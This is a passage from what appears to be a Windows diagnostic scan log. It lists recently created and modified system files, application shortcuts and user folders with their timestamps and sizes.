2016-09-15 09:38 - 00203776 _____ (Microsoft Corporation) C:\WINDOWS\system32\PimIndexMaintenance.dll 2016-09-29 15:12 - 2016-09-15 09:37 - 01507840 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.FaceAnalysis.dll 2016-09-29 15:12 - 2016-09-15 09:37 - 00912384 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.SmartCards.dll 2016-09-29 15:12 - 2016-09-15 09:37 - 00296448 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlancfg.dll 2016-09-29 15:12 - 2016-09-15 09:37 - 00171520 _____ (Microsoft Corporation) C:\WINDOWS\system32\biwinrt.dll 2016-09-29 15:12 - 2016-09-15 09:37 - 00147456 _____ (Microsoft Corporation) C:\WINDOWS\system32\winsrv.dll 2016-09-29 15:12 - 2016-09-15 09:36 - 00719360 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\WdiWiFi.sys 2016-09-29 15:12 - 2016-09-15 09:36 - 00448512 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TpmCoreProvisioning.dll 2016-09-29 15:12 - 2016-09-15 09:36 - 00387584 _____ (Microsoft Corporation) C:\WINDOWS\system32\iedkcs32.dll 2016-09-29 15:12 - 2016-09-15 09:36 - 00358912 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.dll 2016-09-29 15:12 - 2016-09-15 09:36 - 00324608 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.LockScreen.dll 2016-09-29 15:12 - 2016-09-15 09:36 - 00257024 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.CredDialogController.dll 2016-09-29 15:12 - 2016-09-15 09:35 - 00645120 _____ (Microsoft Corporation) C:\WINDOWS\system32\qedit.dll 2016-09-29 15:12 - 2016-09-15 09:35 - 00472064 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.Bluetooth.dll 2016-09-29 15:12 - 2016-09-15 09:35 - 00432640 _____ (Microsoft Corporation) C:\WINDOWS\system32\SndVolSSO.dll 2016-09-29 15:12 - 2016-09-15 09:35 - 00331776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SessEnv.dll 2016-09-29 15:12 - 2016-09-15 09:35 - 00128000 _____ (Microsoft Corporation) C:\WINDOWS\system32\rshx32.dll 2016-09-29 15:12 - 2016-09-15 09:34 - 00642048 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.InkControls.dll 2016-09-29 15:12 - 2016-09-15 09:33 - 00966144 _____ (Microsoft Corporation) C:\WINDOWS\system32\sbe.dll 2016-09-29 15:12 - 2016-09-15 09:33 - 00560128 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppReadiness.dll 2016-09-29 15:12 - 2016-09-15 09:31 - 00090624 _____ (Microsoft Corporation) C:\WINDOWS\system32\pwrshplugin.dll 2016-09-29 15:12 - 2016-09-15 09:30 - 03776512 _____ (Microsoft Corporation) C:\WINDOWS\system32\MFMediaEngine.dll 2016-09-29 15:12 - 2016-09-15 09:30 - 01403392 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Editing.dll 2016-09-29 15:12 - 2016-09-15 09:30 - 00713216 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\srv2.sys 2016-09-29 15:12 - 2016-09-15 09:30 - 00169984 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Energy.dll 2016-09-29 15:12 - 2016-09-15 09:29 - 00329728 _____ (Microsoft Corporation) C:\WINDOWS\system32\fvecpl.dll 2016-09-29 15:12 - 2016-09-15 09:28 - 00442368 _____ (Microsoft Corporation) C:\WINDOWS\system32\PlayToDevice.dll 2016-09-29 15:12 - 2016-09-15 09:27 - 00796672 _____ (Microsoft Corporation) C:\WINDOWS\system32\fvewiz.dll 2016-09-29 15:12 - 2016-09-15 09:27 - 00228352 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSAC3ENC.DLL 2016-09-29 15:12 - 2016-09-15 09:25 - 01217024 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Audio.dll 2016-09-29 15:12 - 2016-09-15 09:25 - 00411648 _____ (Microsoft Corporation) C:\WINDOWS\system32\SensorsApi.dll 2016-09-29 15:12 - 2016-09-15 09:24 - 04596224 _____ (Microsoft Corporation) C:\WINDOWS\system32\xpsrchvw.exe 2016-09-29 15:12 - 2016-09-15 09:24 - 00800768 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Security.Authentication.Web.Core.dll 2016-09-29 15:12 - 2016-09-15 09:24 - 00538624 _____ (Microsoft Corporation) C:\WINDOWS\system32\PlayToManager.dll 2016-09-29 15:12 - 2016-09-15 09:24 - 00467456 _____ (Microsoft Corporation) C:\WINDOWS\system32\Geolocation.dll 2016-09-29 15:12 - 2016-09-15 09:24 - 00139776 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Devices.dll 2016-09-29 15:12 - 2016-09-15 09:23 - 01040896 _____ (Microsoft Corporation) C:\WINDOWS\system32\NaturalLanguage6.dll 2016-09-29 15:12 - 2016-09-15 09:23 - 00460800 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Midi.dll 2016-09-29 15:12 - 2016-09-15 09:22 - 00857600 _____ (Microsoft Corporation) C:\WINDOWS\system32\mprddm.dll 2016-09-29 15:12 - 2016-09-15 09:20 - 00875520 _____ (Microsoft Corporation) C:\WINDOWS\system32\TokenBroker.dll 2016-09-29 15:12 - 2016-09-15 09:19 - 01424896 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.Maps.dll 2016-09-29 15:12 - 2016-09-15 09:17 - 00122368 _____ (Microsoft Corporation) C:\WINDOWS\system32\FontProvider.dll 2016-09-29 15:12 - 2016-09-15 09:16 - 00886784 _____ (Microsoft Corporation) C:\WINDOWS\system32\CPFilters.dll 2016-09-29 15:12 - 2016-09-15 09:16 - 00531456 _____ (Microsoft Corporation) C:\WINDOWS\system32\TpmCoreProvisioning.dll 2016-09-29 15:12 - 2016-08-05 20:33 - 00020992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\smphost.dll 2016-09-29 15:03 - 2016-10-17 21:03 - 00000000 ____D C:\Users\Kyle Aniel\Desktop\777 2016-09-26 05:55 - 2016-09-26 05:55 - 00000000 ____D C:\Users\banie_000\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Captain Sim 2016-09-26 05:55 - 2016-09-26 05:55 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Captain Sim 2016-09-26 05:55 - 2016-09-26 05:55 - 00000000 ____D C:\Flight Simulator X Files 2016-09-26 05:41 - 2016-10-16 12:20 - 00000000 ____D C:\Users\Kyle Aniel\AppData\Roaming\qBittorrent 2016-09-26 05:41 - 2016-09-26 05:41 - 00000000 ____D C:\Users\Kyle Aniel\AppData\Local\qBittorrent 2016-09-26 05:41 - 2016-09-26 05:41 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\qBittorrent 2016-09-26 05:41 - 2016-09-26 05:41 - 00000000 ____D C:\Program Files (x86)\qBittorrent 2016-09-25 21:56 - 2016-09-25 21:56 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Universal Extractor 2016-09-25 21:56 - 2016-09-25 21:56 - 00000000 ____D C:\Program Files (x86)\Universal Extractor 2016-09-25 20:48 - 2016-10-19 14:55 - 00000000 ____D C:\ProgramData\Gramblr 2016-09-25 20:48 - 2016-10-18 19:40 - 00001015 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Gramblr.lnk 2016-09-25 20:48 - 2016-10-13 14:48 - 00000000 ____D C:\Program Files\Gramblr 2016-09-25 19:12 - 2016-09-25 19:12 - 00000040 ___SH C:\WINDOWS\cnerolf.bin 2016-09-25 09:49 - 2016-09-25 09:49 - 00334616 _____ (Microsoft Corporation) C:\WINDOWS\system32\concrt140.dll 2016-09-25 09:49 - 2016-09-25 09:49 - 00089328 _____ (Microsoft Corporation) C:\WINDOWS\system32\vcruntime140.dll 2016-09-25 09:49 - 2016-09-25 09:49 - 00085744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vcruntime140.dll 2016-09-25 09:46 - 2016-09-25 09:46 - 00639728 _____ (Microsoft Corporation) C:\WINDOWS\system32\msvcp140.dll 2016-09-25 09:46 - 2016-09-25 09:46 - 00244504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\concrt140.dll 2016-09-25 09:45 - 2016-09-25 09:45 - 00443632 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msvcp140.dll 2016-09-25 09:45 - 2016-09-25 09:45 - 00394496 _____ (Microsoft Corporation) C:\WINDOWS\system32\vccorlib140.dll 2016-09-25 09:45 - 2016-09-25 09:45 - 00271104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vccorlib140.dll 2016-09-24 20:36 - 2016-09-24 20:31 - 4282296952 _____ C:\Users\Kyle Aniel\Desktop\MVI_0072.MOV 2016-09-24 20:36 - 2016-09-24 19:43 - 721691356 _____ C:\Users\Kyle Aniel\Desktop\MVI_0071.MOV 2016-09-24 20:36 - 2016-09-24 19:40 - 164218400 _____ C:\Users\Kyle Aniel\Desktop\MVI_0070.MOV 2016-09-24 20:33 - 2016-09-24 20:28 - 1372618752 _____ C:\Users\Kyle Aniel\Desktop\00095.MTS 2016-09-24 20:32 - 2016-09-24 20:11 - 2080210944 _____ C:\Users\Kyle Aniel\Desktop\00094.MTS 2016-09-24 20:32 - 2016-09-24 19:22 - 385056768 _____ C:\Users\Kyle Aniel\Desktop\00093.MTS 2016-09-24 20:32 - 2016-09-24 19:19 - 140378112 _____ C:\Users\Kyle Aniel\Desktop\00092.MTS 2016-09-24 15:27 - 2016-09-24 15:50 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CaptainSim 757-200 PRO 2016-09-24 15:27 - 2016-09-24 15:27 - 00000000 ____D C:\Program Files\Microsoft Games 2016-09-20 19:47 - 2016-09-20 19:47 - 00002507 _____ C:\Users\Kyle Aniel\Desktop\Safari.lnk 2016-09-20 19:41 - 2016-10-18 19:40 - 00000726 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows 10 Upgrade Assistant.lnk 2016-09-20 19:41 - 2016-10-18 19:38 - 00000726 _____ C:\Users\banie_000\Desktop\Windows 10 Upgrade Assistant.lnk 2016-09-20 19:41 - 2016-09-20 19:41 - 00000000 ____D C:\Windows10Upgrade ==================== One Month Modified files and folders ======== (If an entry is included in the fixlist, the file/folder will be moved.) 2016-10-19 14:44 - 2016-07-16 04:47 - 00000000 ____D C:\WINDOWS\AppReadiness 2016-10-19 14:43 - 2016-07-16 04:47 - 00000000 ___HD C:\Program Files\WindowsApps 2016-10-19 14:40 - 2015-02-18 13:21 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Verizon 2016-10-19 14:39 - 2016-08-13 13:16 - 00000000 ____D C:\Users\Kyle Aniel\AppData\Roaming\Spotify 2016-10-19 14:38 - 2016-08-13 13:17 - 00000000 ____D C:\Users\Kyle Aniel\AppData\Local\Spotify 2016-10-19 14:37 - 2014-11-01 19:56 - 00000000 __SHD C:\Users\Kyle Aniel\IntelGraphicsProfiles 2016-10-19 14:36 - 2016-09-16 04:12 - 00000180 _____ C:\WINDOWS\system32\{A6D608F0-0BDE-491A-97AE-5C4B05D86E01}.bat 2016-10-19 14:36 - 2016-08-13 16:35 - 00000000 ____D C:\ProgramData\boost_interprocess 2016-10-19 14:35 - 2016-09-16 04:53 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT 2016-10-19 14:35 - 2016-09-16 04:09 - 00000000 ____D C:\WINDOWS\system32\SleepStudy 2016-10-19 06:56 - 2015-07-19 18:37 - 00000000 ____D C:\Users\Kyle Aniel\AppData\Roaming\Audacity 2016-10-19 05:01 - 2016-09-16 04:16 - 00000000 ____D C:\Users\Kyle Aniel 2016-10-18 23:55 - 2016-07-16 04:45 - 00000000 ____D C:\WINDOWS\INF 2016-10-18 23:53 - 2015-12-25 22:04 - 1317578402 _____ C:\WINDOWS\MEMORY.DMP 2016-10-18 20:55 - 2015-11-30 04:58 - 01824812 _____ C:\WINDOWS\system32\PerfStringBackup.INI 2016-10-18 20:26 - 2015-10-05 15:21 - 00000000 ____D C:\Users\Kyle Aniel\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps 2016-10-18 19:54 - 2014-11-02 17:43 - 00000000 ____D C:\Users\Kyle Aniel\AppData\Local\Adobe 2016-10-18 19:51 - 2016-07-16 04:47 - 00000000 ____D C:\WINDOWS\addins 2016-10-18 19:40 - 2016-09-18 07:21 - 00002222 _____ C:\Users\Public\Desktop\Google Earth.lnk 2016-10-18 19:40 - 2016-09-16 04:35 - 00001564 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk 2016-10-18 19:40 - 2016-09-10 16:54 - 00002236 _____ C:\Users\Public\Desktop\Style Builder 2016.lnk 2016-10-18 19:40 - 2016-09-10 16:54 - 00002150 _____ C:\Users\Public\Desktop\LayOut 2016.lnk 2016-10-18 19:40 - 2016-09-10 16:54 - 00002061 _____ C:\Users\Public\Desktop\SketchUp 2016.lnk 2016-10-18 19:40 - 2016-09-04 15:17 - 00001310 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe After Effects CC 2015.lnk 2016-10-18 19:40 - 2016-09-04 15:13 - 00001416 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Character Animator (Preview).lnk 2016-10-18 19:40 - 2016-09-04 14:16 - 00001610 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Application Manager.lnk 2016-10-18 19:40 - 2016-09-04 14:16 - 00001604 _____ C:\Users\Public\Desktop\Adobe Application Manager.lnk 2016-10-18 19:40 - 2016-08-04 19:11 - 00002653 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\EditVoicepack X.lnk 2016-10-18 19:40 - 2016-07-29 22:39 - 00000978 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\GIMP 2.lnk 2016-10-18 19:40 - 2016-07-12 12:13 - 00002507 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Safari.lnk 2016-10-18 19:40 - 2016-07-12 12:13 - 00002501 _____ C:\Users\Public\Desktop\Safari.lnk 2016-10-18 19:40 - 2016-06-08 08:09 - 00000957 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\paint.net.lnk 2016-10-18 19:40 - 2016-06-08 08:09 - 00000951 _____ C:\Users\Public\Desktop\paint.net.lnk 2016-10-18 19:40 - 2016-05-07 07:07 - 00001045 _____ C:\Users\Public\Desktop\WinRAR.lnk 2016-10-18 19:40 - 2016-05-06 20:00 - 00001092 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\OpenShot Video Editor.lnk 2016-10-18 19:40 - 2016-04-07 19:48 - 00001823 _____ C:\Users\Public\Desktop\iTunes.lnk 2016-10-18 19:40 - 2016-03-11 22:17 - 00002615 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SBACSecureBrowser.lnk 2016-10-18 19:40 - 2016-03-11 22:17 - 00002609 _____ C:\Users\Public\Desktop\SBACSecureBrowser.lnk 2016-10-18 19:40 - 2016-02-13 07:26 - 00001223 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk 2016-10-18 19:40 - 2016-02-13 07:26 - 00001217 _____ C:\Users\Public\Desktop\Mozilla Firefox.lnk 2016-10-18 19:40 - 2015-12-29 13:47 - 00002267 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk 2016-10-18 19:40 - 2015-12-29 13:47 - 00002261 _____ C:\Users\Public\Desktop\Google Chrome.lnk 2016-10-18 19:40 - 2015-12-28 22:04 - 00001083 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Audacity.lnk 2016-10-18 19:40 - 2015-12-28 22:04 - 00001077 _____ C:\Users\Public\Desktop\Audacity.lnk 2016-10-18 19:40 - 2015-12-09 20:31 - 00000908 _____ C:\Users\Public\Desktop\CCleaner.lnk 2016-10-18 19:40 - 2015-12-06 16:24 - 00001977 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Synthesia.lnk 2016-10-18 19:40 - 2015-12-06 16:24 - 00001971 _____ C:\Users\Public\Desktop\Synthesia.lnk 2016-10-18 19:40 - 2015-11-21 10:00 - 00002607 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CASecureBrowser.lnk 2016-10-18 19:40 - 2015-10-24 17:16 - 00002488 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Word 2016.lnk 2016-10-18 19:40 - 2015-10-24 17:16 - 00002487 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PowerPoint 2016.lnk 2016-10-18 19:40 - 2015-10-24 17:16 - 00002450 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Excel 2016.lnk 2016-10-18 19:40 - 2015-10-24 17:16 - 00002430 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\OneNote 2016.lnk 2016-10-18 19:40 - 2015-09-21 13:38 - 00002445 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk 2016-10-18 19:40 - 2015-09-21 13:38 - 00002125 _____ C:\Users\Public\Desktop\Acrobat Reader DC.lnk 2016-10-18 19:40 - 2015-07-24 07:52 - 00001869 _____ C:\Users\Public\Desktop\McAfee Security Center.lnk 2016-10-18 19:40 - 2015-02-18 01:10 - 00001098 _____ C:\Users\Public\Desktop\Vz In-Home Agent.lnk 2016-10-18 19:40 - 2015-02-01 21:00 - 00002523 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Apple Software Update.lnk 2016-10-18 19:40 - 2014-11-01 17:50 - 00002497 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Live Messenger.lnk 2016-10-18 19:40 - 2014-11-01 17:50 - 00001469 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Live Mail.lnk 2016-10-18 19:40 - 2014-11-01 17:50 - 00001385 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Photo Gallery.lnk 2016-10-18 19:40 - 2014-11-01 17:50 - 00001316 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Movie Maker.lnk 2016-10-18 19:38 - 2016-09-02 21:36 - 00001164 _____ C:\Users\banie_000\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\IcoFX 2.lnk 2016-10-18 19:38 - 2016-08-22 18:30 - 00001107 _____ C:\Users\banie_000\Desktop\MidiEditor.lnk 2016-10-18 19:38 - 2016-08-13 15:12 - 00002196 _____ C:\Users\banie_000\Desktop\Wirecast.lnk 2016-10-18 19:38 - 2016-08-05 10:52 - 00001326 _____ C:\Users\banie_000\Desktop\Voice Changer 9.0 Diamond.lnk 2016-10-18 19:38 - 2016-07-29 23:31 - 00001933 _____ C:\Users\banie_000\Desktop\ADE 170.lnk 2016-10-18 19:38 - 2016-07-20 12:20 - 00002056 _____ C:\Users\banie_000\Desktop\767-300 FSX Configuration Manager.lnk 2016-10-18 19:38 - 2016-07-05 19:10 - 00001011 _____ C:\Users\banie_000\Desktop\Open Broadcaster Software.lnk 2016-10-18 19:38 - 2016-06-08 08:03 - 00001985 _____ C:\Users\banie_000\Desktop\DXTBmp.lnk 2016-10-18 19:38 - 2015-11-13 21:32 - 00001291 _____ C:\Users\banie_000\Desktop\video-editor_setup_full1107(1).exe.lnk 2016-10-18 19:38 - 2015-11-13 20:43 - 00001301 _____ C:\Users\banie_000\Desktop\video-editor-idco_setup_full1107.exe.lnk 2016-10-18 19:38 - 2015-11-13 20:00 - 00001276 _____ C:\Users\banie_000\Desktop\video-editor_setup_full1107.exe.lnk 2016-10-18 19:38 - 2015-08-29 09:54 - 00002391 _____ C:\Users\banie_000\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk 2016-10-18 18:35 - 2016-08-16 13:16 - 00000000 ____D C:\Users\Kyle Aniel\Documents\Flight Simulator X Files 2016-10-18 18:35 - 2016-08-04 21:03 - 00000000 ____D C:\Program Files (x86)\FS Recorder for FSX 2016-10-18 14:47 - 2016-09-16 04:16 - 00000000 ____D C:\Users\banie_000 2016-10-17 17:29 - 2016-04-05 18:54 - 00000000 ____D C:\ProgramData\BlueStacksSetup 2016-10-17 15:23 - 2016-07-16 04:36 - 00000000 ____D C:\WINDOWS\CbsTemp 2016-10-16 22:25 - 2016-09-04 15:19 - 00001531 _____ C:\Users\Kyle Aniel\Desktop\AfterFX.exe - Shortcut.lnk 2016-10-16 22:25 - 2016-08-28 12:55 - 00002885 _____ C:\Users\Kyle Aniel\Desktop\Microsoft Flight Simulator X.lnk 2016-10-16 22:25 - 2016-07-15 20:52 - 00001164 _____ C:\Users\Kyle Aniel\Desktop\Microsoft Expression Encoder 4.lnk 2016-10-16 22:25 - 2016-07-15 20:51 - 00001201 _____ C:\Users\Kyle Aniel\Desktop\Microsoft Expression Encoder 4 Screen Capture.lnk 2016-10-16 22:25 - 2016-07-05 10:26 - 00001255 _____ C:\Users\Kyle Aniel\Desktop\HitFilm 4 Express.lnk 2016-10-16 22:25 - 2016-03-15 16:32 - 00001521 _____ C:\Users\Kyle Aniel\Desktop\DVDMaker.lnk 2016-10-16 22:25 - 2015-12-09 20:39 - 00001892 _____ C:\Users\Kyle Aniel\Desktop\PowerPoint 2016.lnk 2016-10-16 22:25 - 2015-12-09 20:39 - 00001877 _____ C:\Users\Kyle Aniel\Desktop\Word 2016.lnk 2016-10-16 16:58 - 2016-07-16 04:47 - 00000000 ____D C:\ProgramData\regid.1991-06.com.microsoft 2016-10-16 16:57 - 2014-07-16 23:41 - 00000000 ____D C:\Program Files (x86)\Microsoft Office 2016-10-16 06:22 - 2014-12-07 21:10 - 00000364 _____ C:\WINDOWS\Tasks\HPCeeScheduleForKYLE-PC$.job 2016-10-15 19:02 - 2015-05-01 14:58 - 00000000 ____D C:\Users\Kyle Aniel\AppData\Local\Screencast-O-Matic 2016-10-15 17:03 - 2014-12-22 16:56 - 00000000 ____D C:\Users\Kyle Aniel\.VirtualBox 2016-10-15 17:01 - 2015-01-10 11:00 - 00000000 ____D C:\Users\Kyle Aniel\VirtualBox VMs 2016-10-15 08:13 - 2016-07-16 04:47 - 00000000 ____D C:\WINDOWS\rescache 2016-10-14 23:19 - 2016-02-03 21:37 - 00000000 ____D C:\Users\Kyle Aniel\Documents\Kyle Laptop 2-3-16 2016-10-14 19:06 - 2014-11-01 19:52 - 00000000 __RHD C:\Users\Public\AccountPictures 2016-10-14 19:03 - 2016-09-16 04:09 - 04981224 _____ C:\WINDOWS\system32\FNTCACHE.DAT 2016-10-14 19:01 - 2016-07-16 04:47 - 00000000 ___SD C:\WINDOWS\system32\DiagSvcs 2016-10-14 19:01 - 2016-07-16 04:47 - 00000000 ___RD C:\WINDOWS\ImmersiveControlPanel 2016-10-14 19:01 - 2016-07-16 04:47 - 00000000 ____D C:\WINDOWS\system32\WinBioPlugIns 2016-10-14 19:01 - 2016-07-16 04:47 - 00000000 ____D C:\WINDOWS\system32\migwiz 2016-10-14 19:01 - 2016-07-16 04:47 - 00000000 ____D C:\WINDOWS\ShellExperiences 2016-10-14 19:01 - 2016-07-16 04:47 - 00000000 ____D C:\Program Files\Windows Photo Viewer 2016-10-14 19:01 - 2016-07-16 04:47 - 00000000 ____D C:\Program Files (x86)\Windows Photo Viewer 2016-10-13 21:06 - 2016-02-09 18:34 - 00000000 ____D C:\Users\Kyle Aniel\Documents\Sound recordings 2016-10-13 17:02 - 2016-07-29 22:40 - 00000000 ____D C:\Users\Kyle Aniel\.gimp-2.8 2016-10-13 16:53 - 2015-12-24 21:16 - 00000000 ____D C:\Users\banie_000\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Rikoooo Add-ons 2016-10-13 15:53 - 2014-11-06 00:12 - 00000000 ____D C:\WINDOWS\system32\MRT 2016-10-13 15:40 - 2014-11-06 00:12 - 143495576 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe 2016-10-13 15:07 - 2016-07-16 04:43 - 00783360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TSWorkspace.dll 2016-10-13 15:07 - 2016-07-16 04:42 - 00177664 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Web.Diagnostics.dll 2016-10-13 14:47 - 2014-11-02 17:45 - 00000830 _____ C:\WINDOWS\Tasks\Adobe Flash Player Updater.job 2016-10-11 21:24 - 2016-02-09 17:13 - 00000000 ____D C:\Users\Kyle Aniel\Documents\MultitrackStudio Songs 2016-10-11 19:55 - 2016-07-16 04:47 - 00000000 ____D C:\WINDOWS\SysWOW64\Macromed 2016-10-11 19:55 - 2016-07-16 04:47 - 00000000 ____D C:\WINDOWS\system32\Macromed 2016-10-09 22:12 - 2016-07-29 22:43 - 00000000 ____D C:\Users\Kyle Aniel\.thumbnails 2016-10-07 21:33 - 2016-07-16 04:43 - 00471040 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnet.dll 2016-10-07 21:33 - 2016-07-16 04:43 - 00395264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnet.dll 2016-10-07 21:33 - 2016-07-16 04:43 - 00220672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dplayx.dll 2016-10-07 21:33 - 2016-07-16 04:43 - 00068096 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnathlp.dll 2016-10-07 21:33 - 2016-07-16 04:43 - 00061952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnathlp.dll 2016-10-07 21:33 - 2016-07-16 04:43 - 00047104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpwsockx.dll 2016-10-07 21:33 - 2016-07-16 04:43 - 00027136 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnsvr.exe 2016-10-07 21:33 - 2016-07-16 04:43 - 00025088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpmodemx.dll 2016-10-07 21:33 - 2016-07-16 04:43 - 00023040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnsvr.exe 2016-10-07 21:33 - 2016-07-16 04:43 - 00020992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dplaysvr.exe 2016-10-07 21:33 - 2016-07-16 04:43 - 00010240 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnhupnp.dll 2016-10-07 21:33 - 2016-07-16 04:43 - 00010240 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnhpast.dll 2016-10-07 21:33 - 2016-07-16 04:43 - 00008704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnhupnp.dll 2016-10-07 21:33 - 2016-07-16 04:43 - 00008704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnhpast.dll 2016-10-07 21:33 - 2016-07-16 04:43 - 00006144 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnlobby.dll 2016-10-07 21:33 - 2016-07-16 04:43 - 00006144 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnaddr.dll 2016-10-07 21:33 - 2016-07-16 04:43 - 00005120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnlobby.dll 2016-10-07 21:33 - 2016-07-16 04:43 - 00005120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnaddr.dll 2016-10-07 06:11 - 2014-11-01 19:56 - 00000000 ____D C:\Users\Kyle Aniel\AppData\Local\Packages 2016-10-06 18:03 - 2016-08-15 22:26 - 11087548 _____ C:\Users\Kyle Aniel\Desktop\B737_800.cab 2016-10-05 18:12 - 2016-07-16 04:47 - 00000000 __RHD C:\Users\Public\Libraries 2016-10-05 17:59 - 2016-04-05 18:57 - 00000000 ____D C:\Users\banie_000\AppData\Local\BlueStacks 2016-10-04 19:44 - 2016-09-16 05:08 - 00000000 ___DC C:\WINDOWS\Panther 2016-10-04 19:44 - 2016-09-16 05:02 - 00032216 _____ C:\WINDOWS\diagwrn.xml 2016-10-04 19:44 - 2016-09-16 05:02 - 00026570 _____ C:\WINDOWS\diagerr.xml 2016-10-03 19:51 - 2014-11-01 15:59 - 00000000 ____D C:\Program Files (x86)\Google 2016-10-03 13:09 - 2016-07-16 04:49 - 00828408 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerApp.exe 2016-10-03 13:09 - 2016-07-16 04:49 - 00176632 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerCPLApp.cpl 2016-10-02 20:57 - 2016-06-08 08:09 - 00000000 ___DC C:\Program Files\Staging 2016-10-01 15:44 - 2016-08-02 17:23 - 00000000 ____D C:\Users\banie_000\AppData\Roaming\EZCA 2016-10-01 12:48 - 2016-08-21 20:28 - 00000000 ____D C:\Program Files (x86)\EZCA 2016-10-01 07:59 - 2016-08-13 17:40 - 00000000 ____D C:\ProgramData\Esellerate 2016-10-01 00:10 - 2016-07-16 04:47 - 00000000 ___SD C:\WINDOWS\SysWOW64\F12 2016-10-01 00:10 - 2016-07-16 04:47 - 00000000 ___SD C:\WINDOWS\system32\F12 2016-10-01 00:10 - 2016-07-16 04:47 - 00000000 ____D C:\WINDOWS\SysWOW64\setup 2016-10-01 00:10 - 2016-07-16 04:47 - 00000000 ____D C:\WINDOWS\system32\setup 2016-10-01 00:10 - 2016-07-16 04:47 - 00000000 ____D C:\WINDOWS\system32\oobe 2016-10-01 00:10 - 2016-07-16 04:47 - 00000000 